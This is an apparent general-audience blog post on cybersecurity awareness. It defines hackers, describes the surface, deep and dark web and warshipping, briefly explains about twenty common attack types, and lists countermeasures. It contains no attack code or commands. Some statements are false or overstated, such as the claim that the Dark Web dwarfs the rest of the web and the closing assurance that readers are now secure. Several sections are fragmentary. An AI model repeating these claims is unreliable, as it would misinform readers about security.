Knowing how to protect ourselves against hackers
A subject that concerns us all
How do we go about protecting ourselves against hackers?Well as we indicated in our previous post, Protecting teleworkers against hackers, it all comes down to educating ourselves on cybersecurity and cyberthreats.
The more we know
The more we know about cybersecurity and the cyberthreats we all face, the better equipped we are when it comes to fending off hacking attempts.
Understanding cyberthreats
Here is a little bit of context.
What is hacking?
The definition of hacking according to the Oxford Dictionary is: the activity of using computers to get access to data in somebody else’s computer or phone system without permission.
What is a hacker?
Again, according to the Oxford Dictionary, the definition of hacker is: a person who uses computers to get access to data in somebody elses computer or phone system without permission.
There are two (2) kinds of hackers.
- There’s the White Hat hacker who is a good guy.
- Under madate, a White Hat hacker will test your IT infrastructure and systems, in order to find vulnerabilities that can be exploited, and report on them, so the appropriate measures and mechanisms can be put in place and prevent unauthorized access.
- And then there’s the Black Hat hacker. This is the guy we need to worry about
- Black Hat hackers steal information for profit and/or to cause harm to his victims.
This lengthy post is all about protecting ourselves against the threat Black Hat hackers pose to everyone, every business, institution, organization, and governments in general.
Hacking and hackers have existed ever since the first computer came to be. With the arrival of the first personal computers and electronic forums such as CompuServe and Arpanet (precursor to today’s Internet), the threat from hackers only increased. With the advent of the Internet that treat increased exponentially. Here’s why.
Threat level?
The Internet increased the threat level we face from hackers
Take note and be aware
The World Wide Web (WWW) or Internet as we commonly refer to it, is far bigger than most people realize. If we break it down and put it in simple terms, the WWW consists of:
The Surface Web
This is the Internet that we've all come to know and rely on and, in many cases, many of us use daily.
From email to social networks, from video conferencing to voice-over IP and other on-line services, no matter where you are on the planet, it connects us all in a variety of different ways.
It’s estimated the Surface Web consists of over 5,000,000,000 pages, with more being added every day.
The Deep Web
The Deep Web is much, much bigger than the Surface Web.
It consists of protected pages that cannot be accessed, without having the proper user login and authentication credentials.
Such pages include banking websites, government agencies, e-commerce websites, corporate intranets and many other protected sites, portals and pages.
The Dark Web
The Dark Web is a section of the Internet that’s hidden and can’t be accessed through a conventional browser.
In terms of it's size, the Dark Web exceeds by far, both the Surface Web and the Deep Web put together.
It's a gigantic marketplace, where all sorts of illicit and illegal activities and trading in ill gotten gains are taking place, every minute of every day.
Now that we have a better understanding of what the world wide web (WWW) consist of, what exactly do we have to protect ourselves against? In a word, attacks.
Hackers launch various types of attacks in the hope of gaining access to private and sensitive information, that they can than turn around and use to their own benefit or sell. It goes without saying that what’s to a hacker’s benefit isn’t going to be good for his victims!
Cyberthreats can be found almost everywhere on the internet
Contrary to what many say and believe, the Internet is still very much like the wild-wild-west of old. You have some good things going on as well as a lot of shenanigans. Some of those shenanigans are just pranks, whereas others can have some extremely severe consequences.
Hackers are constantly innovating and creating new ways to attack unsuspecting and often ill protected users. Therefore, it’s important to know what we’re up against and what to do to protect ourselves against those cyberthreats.
As the old saying goes, an ounce of prevention is better than a pound of cure. When it comes to protecting our private and confidential information, which we all have (ex: banking login credentials, credit card details, social security number, etc…), those words never rang more true!
Types of cyberattacks
There are twenty (20) types of common cyberattacks, that cybersecurity professionals have known about for decades.
Regardless of who and what you are, all of us need to know how to defend ourselves against them. We’ll talk about those shortly.
There is however a new form of attack that was identified in 2019 by IBM, that everyone needs to be aware of.
This new threat is called warshipping. Although it is said to have been first discussed in 2008 at a DEFCON hacker conference, only recently did it become reality.
What is warshipping?
Warshipping is the ability to break into someone’s Wi-Fi network from afar.
Unlike wardriving, which consist of hackers driving around with a bidirectional antenna, looking for wireless network signals they can crack, warshipping uses inexpensive off-the-shelf components available in many electronic stores (think RadioShack or The Source in Canada) to build a single-board computer with 3G and WI-FI capabilities, that’s powered by a cell phone battery.
Without going into too much details (you can read the Infosecurity article for that), this small device can be hidden in a package delivered by the postal service, UPS, FedEx or any of the many other courier services so many of us use. Once the package reaches its destination:
- It connects to the local WI-FI network, harvests the data locally and then using its cellular connection, sends it to a remote location .
- If it ends up in a mail room where it can often sit around for a long period of time, it can mount a man-in- the-middle (MITM) attack, which we’ll again outline later on, where it impersonates a legitimate WI-FI access point and tricks users into accessing it. Once the users do, it collects their user credentials and other sensitive information which again, via it’s cellular connection, it sends out to a remote location
Once the hacker has the information the device collected, using any number of cracking resources, they can extract valuable data, allowing them to gain access to the victims’ network and connected devices.
IBM has demonstrated that this type of attack is real.
So, bottom line, whether you’re a corporation, a bank, a government agency, or an individual, if you have access to sensitive information that is valuable and coveted, carefully examine any and all packages you received, to make sure said package doesn’t have an uninvited guest along with the contents you expected.
Cyberattacks
Twenty (20) most common types of cyberattacks
Knowing about these threats should not be limited only to IT and cybersecurity professionals. We all need to learn more about them and how we go about protecting ourselves.
DoS and DDoS Attacks
Basically, Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks overwhelm a system to the point that it crashes. It then becomes vulnerable to other types of more targeted attacks.
MITM Attacks
Bottom line, Man-in-the-middle (MITM) attacks is basically spying. It refers to breaches in cybersecurity that make it possible for an attacker to eavesdrop on the data sent back and forth between two people, networks, or computers.
Phishing Attacks
More often than not, a phishing attack consists of malicious emails being made to appear as coming from legitimate sources. The intention here is to gain access to sensitive information and use that information nefariously.
Whale-phishing Attacks
Basically, the same as phishing attacks BUT, going after big fish such as executives and board members of fortune 500 and fortune 100 companies.
Spear-phishing Attacks
Again, basically the same as phishing attacks but this time, targeting a very specific individual that was extensively researched
Ransomware
This is a type of attack that we hear and read about quite often these days.
Ransomware is code that was downloaded either from a website or from an email attachment. Once the code is in place and executes, the computer systems are being held hostage and, become either useless or are re-programmed to do harm, until such time as a ransom is paid to the attacker.
Password Attack
As the name implies, this type of attack is aimed at finding out passwords which then allows the attacker to access the systems without raising suspicion. Password attacks can be simple or complex as one can see.
- The attacker can simply try and guess the password which, if it’s something that’s easy to remember like “12345678”, doesn’t really require much effort on the attacker’s part.
- When users write their passwords on a piece of paper or post it note they then stick to a monitor, the attacker only has to read and write the information or pay someone to do it.
- If unencrypted data circulates on your network, the attacker can intercept that information and grab your password.
- A user is asked to do something where he needs to enter his password and, a keylogger that was installed on the computer grabs that info and send it out to the attacker
- Social engineering is where the attacker researches the targeted individual and uses things such as birthdays, name of his spouse and children, pet names, hobbies and/or a combination of all of the above, just to name a few, to guess the target’s password and /or using a small program that runs all of the possible combinations and permutations, lauches a brute force attack
SQL Injection Attack
Considering the victims of these attacks are governments, financial institutions, large corporations and the likes, these attacks can have far reaching impacts.
SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation, to access to information that was not intended to be displayed.
This information may include any number of items, including, just to name a few,:
- Sensitive company data
- User lists
- Private customer details
URL Interpretation
This consists in altering or fabricating URL addresses (URL poisoning) in order to gain access to the targets’ personal and / or professional information, as well as areas that are inaccessible.
DNS Spoofing
The attacker alters or spoofs the Domain Name System (DNS), in order to send users to fake websites he has total control over, where users are asked to enter information the attacker than grabs.
Session Hijacking
This is a MITM (man-in-the-middle) attack where the attacker takes control of a session between the client and the server. This is done by substituting the IP address of the client for one the attacker fully controls
Brute force attack
As mentioned previously in password attacks, this is where the attacker uses small programs (i.e.: bots), to bombard a system in order to guess the user’s password and, gain access to his intended target
Web Attacks
Insider Threats
This is one of the hardest types of attacks to fight off as it comes from within. Think here of a current employee who already has access to your systems, knows a thing or two about them and, uses that knowledge to gain access to things he shouldn’t.
It could also be a computer savvy disgruntled ex-employee whose login credentials haven’t been purged from the system (happens more often than you think) who remotely accesses your systems with the intention of causing harm.
Trojan Horses
Trojan horses are malicious pieces of codes residing in legitimate software applications, that open backdoors to your systems that hackers can then exploit.
Drive-by Attacks
This is malicious code (i.e.: malware) embedded in an unsecure website. Whenever a user visits that site, the code executes and infects the user’s computer
XSS Attacks
This is basically malicious code (scripts) residing in clickable objects (ex: JavaScripts) on a website, that then gets sent to the user’s browser and quietly sits there, waiting to exploit vulnerabilities.
Going forward, whenever you access that site (or any other the script was programmed to target), if there are indeed vulnerabilities to be exploited, that malicious code (i.e.: malware) executes and the hacker substitutes the website’s code for his.
The injected code can simply be adding spam content to a webpage or the entire website but, it can also insert code that will launch phishing attacks.
Eavesdropping Attacks
As the name implies, this time of attack consists in waiting silently and grabbing whatever information such as login credentials, credit card information and other private and sensitive details that circulates on an unsecured and unencrypted network. It can be either passive or active.
- Passive eavesdropping is where the hacker listens in and grabs whatever information he needs
- Active eavesdropping is where a program is placed on the network where it collects data the hacker can analyze at will.
Birthday attacks
This consists of abusing a security feature such as a hash algorithm used to authenticate. The hash algorithm is a digital signature. If the hacker can create a hash that’s identical to the user’s signature hash appended to their messages, the hacker can replace the user’s message with his own and the receiving device won’t be the wiser.
Malware Attack
- MITM attacks,
- phishing,
- ransomware,
- SQL injection,
- Trojan horses,
- drive-by attacks, and
- XSS attacks.
- Visiting a malicious website where a piece of code was residing (XSS attack) and attached itself to the user’s browser.
- Installing a software that had malicious code (trojan horse attack) in it.
- Clicked on a malicious link in an email (phishing attack) that sent the user to a malicious site.
- Opened an email attachment (phishing attack) that contained malicious code that installed on the user’s computer.
Cybersecurity
Cybersecurity concerns us all
Basic countermeasures
Going back to our previous post on Protecting teleworkers against hackers and as stated earlier herein, it all starts with educating users. Which is what this post is all about.
This being said, the basic measures we can all take to protect ourselves against hackers are:
- Installing a reliable Internet security software that also includes a firewall on all your connected devices.
- Software packages like Norton 360, Kaspersky internet security, Panda Dome Advanced for example will address those.
- Use strong passwords that are hard to guess and therefore crack.
- If you have too many passwords and it’s hard for you to remember them, many security software packages have a secure password manager you can use to store your credentials.
- Monitor intrusion attempts.
- Again, many security software packages have that capability and send alerts whenever an intrusion attempt is detected and blocked.
- Make sure all the updates, upgrades and patches for your operating system and Internet security software package are installed as they are released.
- Talk about and repeat often that cybersecurity is not to be taken lightly. The more people are aware and taking appropriate measures, the more secure we all are.
Advanced countermeasures
If you are a business or any kind of large organization, there are additional measures that can be put in place to enhance security and prevent your information from ending up in the wrong hands. Such measure include:
- Controlling access. This can include:
- Controlling physical access to premises and computer network infrastructures.
- Using application controls to restrict user access to data and services.
- Controlling ports on computers connected to your network, so no external devices (ex: USB keys) can be used to copy data on them. Devices that the user can then take with him or her as he / she walks out the door.
- Have content filtering security software and / or appliance to filter out malicious emails, attachments and websites
- Use a firewall appliance to protect your network from the outside world as well as internal sections of your network.
- Use virtual private networks (VPNs) to provide secure and authorized remote access.
- Also provide VPN clients to your users. This will enable them to securely access your companies IT resources from remote locations.
- Have a local backup solution in place that is complemented by a cloud backup service.Our article on Local and cloud computing illustrates how these two (2) technologies complement each other as well as the importance of having hybrid infrastructures in place.
- If all your information is gone or corrupted after being the victim of a hack, your backup will enable you to restore your information.
- Make sure you backup your data daily. In so doing, should something severe happen, you can do a complete restore of your data, Which means you may loose only a few hours as opposed to days, weeks or even longer!
Once all these measures are in place, it will make it harder for anyone to steal your valuable information. HOWEVER, you “may” also want to consider using the services of a White Hat hacker just to make sure everything is secure.
A white Hat hacker will perform an ethical hacking mandate which includes intrusion attempts (commonly referred to as penetration testing)and provide you with a report of what his findings are.
If vulnerabilities were found, as part of an ethical hacking mandate, that report will also includes a list of recommendations and measures that can be taken to remedy the situation.
Conclusion
You and your data are now secure
There you have it. You can now rest easy knowing that you’ve done all that needs to be done, to make sure that your private and confidential information is safe and secure.
HOWEVER, just bear in mind that as stated earlier, hackers are constantly innovating and coming up with new ways to get access to things they shouldn’t have.
Therefore, that means that cybersecurity and protecting against cyberthreats in an on-going process. One that none of us can overlook.
We must all be vigilant and keep the measures in place up to date and up to par as well.
